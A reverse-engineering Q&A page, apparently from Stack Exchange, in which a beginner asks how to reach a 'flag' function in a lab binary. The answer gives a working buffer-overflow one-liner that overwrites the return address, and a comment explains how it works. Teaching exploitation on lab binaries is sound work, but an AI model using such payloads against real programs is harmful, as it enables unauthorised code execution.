0

I'm an absolute newbie when it comes to all this side of reverse engineering. Each time I try and understand it, I get lost almost immediately.

I am trying a lab. I open it up in Binary Ninja. I get the following

enter image description here

When I open main I get the following

enter image description here

Nothing much seems to happen but there is a function(?) called flag that looks like what I need

enter image description here

When I copy the address, it comes out as:

0x401152

I'm trying to do stuff like this on the command line but getting nowhere fast

python3 -c "print (28 * 'A' + '\x52\x11\x40')" | ./santa;

I then try to iterate through and no luck although I do get a segmentation fault on the 53rd iteration

for i in {0..60}; do python3 -c "print ($i * 'A' + '\x52\x11\x40')" | ./santa; done

Any pointers? I'm absolutely lost

Improve this question
1
  • 1
    Hi, generally we recommend to paste text as text, not screenshots. The reason being that search engines won't index screenshots the same way as text. Commented Dec 16, 2021 at 9:59

1 Answer 1

Reset to default
0 
python3 -c "print (56 * 'A' + '\x53\x11\x40\x00\x00\x00\x00\x00')" | ./santa
Improve this answer
2
  • 3
    Would you care to elaborate on your solution? Commented Nov 30, 2021 at 8:22
  • Basically they are overflowing the buffer that scanf was entering into, after overflowing out that buffer they will then be filling the saved frame pointer with garbage, after which in the stack comes the return address. So once the function hits retn it'll jump the new address they set 0x401152 Commented Apr 9, 2023 at 16:57

Start asking to get answers

Find the answer to your question by asking.

Ask question

Explore related questions

See similar questions with these tags.